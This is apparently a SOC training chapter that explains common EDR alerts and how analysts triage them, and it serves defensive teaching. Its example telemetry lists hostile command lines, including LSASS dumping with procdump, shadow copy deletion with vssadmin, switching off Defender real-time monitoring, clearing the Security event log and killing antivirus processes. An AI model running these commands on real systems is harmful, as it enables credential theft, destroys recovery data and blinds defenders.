Common EDR alerts are detections generated when endpoint activity matches known malicious or suspicious behavior patterns.
These alerts help SOC analysts identify malware execution, lateral movement, credential access, persistence, or exploitation attempts at the earliest stages of an attack.
Understanding these alerts is essential because they form the core investigation workload in a SOC environment.
This chapter explains the most common EDR alerts in full-depth SOC style, including what triggers them, how they appear in telemetry, what patterns to look for, and how analysts validate severity.
PowerShell Execution Alerts
PowerShell alerts are among the most frequent because attackers abuse PowerShell for fileless malware, C2 communication, and payload execution.
Indicators include:
-
Encoded commands
-
Obfuscated strings
-
Hidden windows
-
Download commands
-
Process injection
-
Script block logging events
Example telemetry:
powershell.exe -nop -w hidden -enc JAB...
powershell.exe → outbound to suspicious IP
powershell.exe spawned by WINWORD.exe
Suspicious when:
-
Parent process is Office, wscript, mshta, or a browser
-
Encoded or obfuscated commands present
-
Contacting unknown IPs or domains
Command and Scripting Engine Abuse Alerts
Attackers abuse script engines such as:
-
cmd.exe
-
wscript.exe
-
cscript.exe
-
mshta.exe
-
wmic.exe
-
rundll32.exe
-
regsvr32.exe
Example telemetry:
mshta.exe loading remote script from URL
rundll32.exe executing unknown DLL
regsvr32.exe loading COM object from Public folder
Suspicious when:
-
Script engines are spawned by non-standard parents
-
Paths reference user directories
-
External URLs appear
-
DLL loads come from TEMP or Public folders
Malware/Executable Discovery Alerts
EDR frequently detects malicious or suspicious executable behavior.
Triggers include:
-
Unsigned executables
-
High entropy files
-
Known malware signatures
-
Tampering with system processes
-
Attempts to disable security tools
Example telemetry:
payload.exe created in C:\Users\Public
unknown.exe connecting to IP
exe file dropped by powershell
Suspicious when:
-
Filename resembles random characters
-
Executable appears from phishing-related processes
-
Correlated with network anomalies
Credential Dumping Alerts
EDR alerts on attempts to access or dump credentials from LSASS or SAM.
Common triggers:
-
Mimikatz behavior
-
procdump targeting LSASS
-
Unusual handles opened to LSASS
-
Memory access flags
Example telemetry:
process: attacker.exe → lsass.exe (handle: 0x10)
procdump.exe -ma lsass.exe
powershell exhibiting credential capture patterns
Suspicious when:
-
Executable is unsigned/unexpected
-
Occurs on high-value servers
-
Follows initial compromise activity
Persistence Mechanism Alerts
Attackers create persistence to survive reboots.
Common persistence alerts:
-
Registry Run key creation
-
Scheduled tasks
-
Services created or modified
-
Startup folder modifications
-
WMI persistence
Example telemetry:
reg.exe writing HKCU\Software\Microsoft\Windows\Run
schtasks.exe /create /tn Update
new service created: updater
Suspicious when:
-
Persistence created shortly after malware execution
-
Registered by unusual parents (powershell, cmd)
-
Occurs on non-admin workstations
Lateral Movement Alerts
Issued when attackers try to move inside the network.
Common indicators:
-
PsExec usage
-
WinRM execution
-
Remote Powershell
-
SMB connections from unusual hosts
-
WMI process launches
Example telemetry:
psexecsvc.exe spawned
wmiprvse.exe spawned by remote machine
powershell remoting session created
Suspicious when:
-
Movement originates from compromised workstation
-
Lateral actions target servers or domain controllers
-
Combined with credential dumping behavior
Suspicious Network Connection Alerts
EDR monitors outbound connections for suspicious behavior.
Indicators:
-
C2 traffic
-
Beaconing
-
Connections to newly created domains
-
High-frequency small HTTPS requests
-
Network traffic from unusual binaries
Example telemetry:
powershell.exe → 91.22.113.10:443
dllhost.exe repeatedly beaconing every 60 seconds
exe in AppData connecting to unknown domain
Suspicious when:
-
Domain is newly registered
-
IP belongs to bulletproof hosting
-
Pattern matches C2 behavior
Fileless Malware Alerts
Fileless malware runs entirely in memory.
Indicators:
-
Memory injection
-
Script-based payloads
-
No associated dropped file
-
Reflective DLL loading
Example telemetry:
malicious thread injected into explorer.exe
powershell spawning in-memory assembly
rundll32 loading DLL from memory buffer
Suspicious when:
-
Child processes interact with network endpoints
-
Memory regions are RWX
-
Process has no legitimate reason for injection
Ransomware Behavior Alerts
Common high-severity EDR alerts include:
-
Mass file rename events
-
File encryption patterns
-
Shadow copy deletion attempts
-
Backup tampering
-
High-volume file modifications
Example telemetry:
vssadmin.exe Delete Shadows /All
unknown.exe renaming hundreds of files
high disk write operations
Suspicious when:
-
Activity starts immediately after suspicious execution
-
Commands occur outside admin maintenance windows
Defense Evasion Alerts
Attackers disable or bypass security tools.
Indicators:
-
Killing antivirus/EDR processes
-
Modifying registry keys to weaken defenses
-
Clearing event logs
-
Obfuscation attempts
Example telemetry:
powershell Set-MpPreference -DisableRealtimeMonitoring $true
taskkill /F /IM antivirus.exe
wevtutil cl Security
Suspicious when:
-
Comes from non-admin accounts
-
Occurs after malware execution
-
Correlates with lateral movement
Intel Dump
-
Common EDR alerts include PowerShell abuse, fileless malware, credential dumping, persistence creation, and lateral movement.
-
EDR highlights suspicious parents, paths, network activity, and behavioral patterns.
-
Alerts are validated by checking lineage, command-line arguments, reputation, and correlated logs.
-
High-severity alerts include LSASS access, ransomware patterns, and C2 communication.
-
Process tree context is essential for determining true malicious intent.